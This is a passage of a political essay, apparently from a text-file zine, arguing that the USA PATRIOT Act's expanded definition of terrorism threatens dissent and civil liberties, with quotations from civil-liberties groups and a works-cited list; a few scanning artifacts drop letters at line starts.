Ss 
t 


care tactic in order to keep what some deem as undesirables at bay, rather 
han a tool for preventing terrorism. 


Even the definition of "terrorism" has undergone a major overhaul 
in the USAPA. Since 1983, the United States defined terrorism as "the 
premeditated, politically motivated violence perpetrated against 
n 
i 


oncombatant targets by subnational groups or clandestine agents, usually 


ntended to influence an audience" (Chang). Essentially, it draws the line 
at people who intend to impact a government through violence of its 
civilians. This definition has been around for close to twenty years and 
has served its purpose well because of its straightforwardness. It 


addresses the point, and it does not overreach its bounds by taking into 
consideration acts or organizations that are not related to terrorism. As 
of October 26, 2001, the definition has become muddled enough to include 
"intimidation of civilian population," "affecting the conduct of government 
through mass destruction, assassination or kidnapping," or any act that is 
"dangerous to human life." It also spurs off to include "domestic 
terrorism" which is an act of terrorism by an internal organization (ACLU 
04-Apr-03). All of these pieces can be legitimately molded to include 
activists, protestors, looters and rioters (all potentially dangerous to 
human life); embezzlers and so-called computer hackers (dangerous to 
financial institutions and therefore intimidating to civilians and 
government); serial killers, mass murderers, serial rapists (dangerous to 
human life and intimidation of civilians); and can even be stretched to the 
point of including writers, publishers, journalists, musicians, comedians, 
pundits and satirists based solely on their scope of influence. To think 
that by increasing the size of the terrorism umbrella, organizations like 
People for the Ethical Treatment of Animals (PETA), Food Not Bombs (FNB), 
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and Anti-Racist Action (ARA) not to mention hundreds of thousands of 
outspoken protestors and activists for political and social change can be 
lumped in with the same international terrorist factions we have been 
hearing about for years. 


In a report from the ACLU dated December 14, 2001, Gregory T. 
Nojeim, Associate Director of the Washington National Office stated: 
There are very few things that enjoy almost unanimous agreement in 
this country. One of the most important is our collective 
dedication to the ideals of fairness, justice and individual 
liberty. Much of our government is structured around the pursuit 
of each of these ideals for every American citizen. The 
Administration’s actions over the past three months - its 
dedication to secrecy, the tearing down of barriers between 
intelligence gathering and domestic law enforcement and the erosion 
of judicial authority - are not in tune with these ideals. (ACLU 
20-Apr-03) 


All of these provisions taken into account, it makes one wonder if 
the Bush administration’s commitment to ending terrorism is part of a 
larger commitment to end political dissent in general. After all, why 
else would a bill that so blatantly violates our basic civil liberties have 
been rushed through congress and signed into law on the horns of legitimate 
public anxiety and war fever? Thanks to the USAPA, the war on terrorism no 
longer seems concentrated on reducing the loss of innocent life at the 
hands of those who would kill to influence our government so much as it 
focuses on anyone who would like to influence the government regardless of 
their means or intended ends. 


Now is the time, when our leaders see fit to begin whittling away 
at our basic rights that we need to be and stay informed and be as vocal as 
possible. Unfortunately, being outspoken may now land us in hot water, as 
we are now subject to the frivolous and unjust laws contained in the USAPA. 
Logic follows that if a government sees its own people as a threat, then it 
will do what it can to effectively gag them. Why would the American people 
be seen as a threat? All we have to do is wait out the current term and 
vote someon lse into his or her place. That is, unless the right to vote 
is next on the chopping block. 


Never before has their been a time when questioning government 
action can turn someone into a terrorist and therefore an enemy of his own 
country. Standing up for beliefs is terrorist activity? Voicing opinions 
and writing letters to officials is terrorist activity? The right to 
privacy and against unreasonable searches and seizures without probable 
cause is now terrorist activity? No! These are rights guaranteed to us by 
our country’s charter! 


Our leaders have seen fit to draw lines on the pavement and demand 
its allies on one side and its enemies on the other. They are recruiting 
Americans to spy and inform on other Americans without discretion while 
needlessly inflating the importance of such buzzword-labels as 
"unpatriotic," and "un-American." In addition, they are requiring those on 
their side to have blind faith in their leadership. Blind faith is a good 
thing to have in certain walks of life, but political matters are most 
assuredly not one of them. The main reason being that we are all humans 
and therefore subject to the same shortcomings and corruptibility as every 
other human being. For our leaders to somehow suggest that they are above 
this means that they ar xtremely misguided in their pursuits and may no 
longer hold the public’s best interests in mind. 


A report issued by the Center for Constitutional Rights (CCR) one 
year after September 11, 2001 contained this apt summation: 
The Bush Administration’s war against terrorism, without boundary 
or clear end-point, has led to serious abrogation of the rights of 
the people and the obligations of the federal government. Abuses, 
of Fourth and Fifth Amendment rights in particular, have been 
rampant, but more disturbing is the attempt to codify into law 
practices that erode privacy, free speech, and the separation of 
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Now is the time to become and stay informed and make sure that our 


leaders know that we are. There is a complacency that has permeated our 
culture, which dictates that people can not be bothered to take an interest 
in political policy. "Leave the politics to the politicians," is the usual 


cry. Many people don’t even try to learn about governmental policy because 
they do not think they will understand it. Admittedly, politics is not as 
palatable as several thousand other things; root canal surgery somehow 
seems less painful. But it is imperative that we make the effort to 
protect ourselves from an administration that sees us as unwitting sheep. 
Especially now, when checks and balances are systematically being broken 
down within the structure of our governing body, it is upon us to keep our 
leaders from becoming excessively corrupt and hold them accountable for 
trying to trample on our freedoms. 


The public anxiety caused by recent events has been overwhelming. 
There is no one in this country that wishes to be a victim of terrorism, 
and the odds of it happening are miniscule at best. Terrorism itself is a 
minor occurrence, but the fear of it has ballooned to the point of mass 
paranoia, which today, seems to be more of a mode of operation rather than 
a temporary affliction. It is wrong for our leaders to use that fear and 
paranoia in order to limit our freedoms, regardless of the cost. 


There are those who feel that they have nothing to worry about 
because they are not terrorists. This logic is faulty because it assumes 
that our law enforcement agencies s us as innocents, which is no longer 
the case under the USAPA. Everyone is treated as a suspect until proven 
otherwise, and even then, the connotation of being a suspected terrorist is 
e 
t 
B 
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nough to ruin an innocent person’s life. Under the 1983 definition of 
errorism, far fewer people than what we are now told would fit the bill. 
y suspecting everyone, more overall undesirables will be weeded out but 
nly a few of those will actually be terrorists. 


Since the World Trade Center disaster, there has been mass 
speculation as far as what liberties we, as a nation, may have to give up 
as a result of national security. And there are those who are so afraid of 
the threat that they are willing to go along with this one-sided argument. 
The other side, being both safe and free, has been largely ignored in the 
media and dodged right and left by the president’s administration. It is 
perfectly normal to fear something, even to the point of being willing to 
give up anything just to make the fear subside, but it cannot be expected 
that everyone, or even a simple majority, feel the same way. The 
difference in opinion must be addressed and the sound basis of freedoms 
that our country was founded upon must remain intact if we are still to be 
entitled to life, liberty and happiness. 


Some would say that the future of our civil rights is hazy and 
unforeseeable. When examining the USAPA and the precedents it sets, the 
future becomes very clear. If we allow the provisions contained in the 
USAPA to linger, we can expect an expansion of that kind of unchecked 
power. In fact, plans are already underway. Attorney General John 
Ashcroft is one of the parties involved in drafting what has been called 
"Patriot II." If the bill is passed, the entropy of civil liberties in 
America will continue unhindered. The bill will further erode governmental 
checks and balances and expand the already loose definition of terrorism to 
incorporate all outspoken dissidents, and hold media outlets responsible 
for airing or printing what would be deemed as domestic terrorism. Under 
this power, mass media would theoretically cease any kind of editorial, 
unpopular opinion, quite possibly even normal news coverage out of fear of 
responsibility. 


If our country remains on its current course, it is said that we 
will become less and less of a democracy and more of a fascist 
parliamentary dictatorship. Eventually, our way of life will be hollowed 
out from the inside and only the most trivial of freedoms will remain. 
Deeper down, we will become a nation of benign citizens under state 
control, and the smart money says that we will still be told that America 
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is the greatest democracy in the world. 


This is why we must stay informed and why we must remain vigilant 
in our struggle to maintain our freedom. The USAPA is detrimental to 
American society because at its core, it operates under the assumption that 
anyone could be a terrorist, or more generally, a threat to government 
policy. In a true democracy, organizations like the ACLU, Bill of Rights 
Defense Committee (BORDC), and Center for Constitutional Rights (CCR) would 
not be needed because all laws would be passed with our basic civil 
liberties in mind. Unfortunately, this is no longer (has it ever truly 
been?) the case. 


The freedoms to voice our opinions and to assemble with others of a 
like-mind have been instrumental rights that we have utilized in order to 
make sure our government hears us. Beyond that, they have played a major 
role in keeping our leaders from excessive corruption. When our officials 
begin to make laws that counteract our freedoms, then it is time to raise 
our voices in unity despite the possibility of being called un-American. 
When our government begins to recruit Americans to inform on other 
Americans, then it is time for open defiance because living in a world 
where you can’t trust your neighbor is not a world worth living in anda 
government that cannot trust its own citizens is a government that itself 
cannot be trusted. When our leaders tell us that our voices and our 
actions are only aiding America’s enemies, then it is time to stand up and 
show our leaders that we are not the servile sheep that they think we are. 


As a people, we need to send a clear, resounding message to our 
elected officials that we deserve our rights, and we deserve leaders who do 
not try to undermine them. But we also deserve safety. Our government has 
done some nasty things overseas, mostly without public knowledge or 
consent, so is it any wonder that terrorists lash out at our leaders by 
lashing out at us? After all, we are easy targets because we take for 
granted that out government will protect us. The demand that we compromise 
our freedoms in order to obtain that protection is not just grossly 
insubordinate, it is indicative of a government that is quickly losing 
interest in the needs of its people. 


Works Cited 


American Civil Liberties Union (ACLU) 04 April 2003 
<http://www.aclu.org/NationalSecurity/NationalSecurity.cfm?ID=11437&c=111> 


American Civil Liberties Union (ACLU) 20 April 2003 
<http://www.aclu.org/NationalSecurity/NationalSecurity.cfm?ID=9857&c=24> 


Bush, George W. "Remarks on Signing the USA PATRIOT Act of 2001." Weekly 
Compilation of Presidential Documents 37 (2001): 1550-1552. 


Center for Constitutional Rights (CCR) 20 April 2003 
<http://www.ccr-ny.org/v2/reports/docs/Civil_Liberties.pdf> 


Chang, Nancy. Center For Constitutional Rights (CCR) 18 April 2003 
<http://www.ccr-ny.org/v2/reports/docs/USA_PATRIOT_ACT.pdf> 


Collins, Jennifer M. "And the Walls Came Tumbling Down: Sharing Grand Jury 
Information with the Intelligence Community Under the USA PATRIOT Act." 
American Criminal Law Review 39 (2002): 1261-1286. 


"GOP Wants to Keep Anti-Terror Powers." San Francisco Chronicle 
09 April 2003: A115 


Hentoff, Nat. "Resistance Rising!" Village Voice 22 November 2002. 


McGee, Jim. "An Intelligence Giant in the Making." Washington Post 
04 November 2001: A4. 


15.txt Wed Apr 26 09:43:44 2017 15 


Neary, Lynn. "Commentary: Worrisome Trend of Bush Administration Efforts to 
Expand Their Collection of Information Data on American Citizens." All 
Things Considered National Public Radio. 18 November 2002. 


|=[ EOF ] 


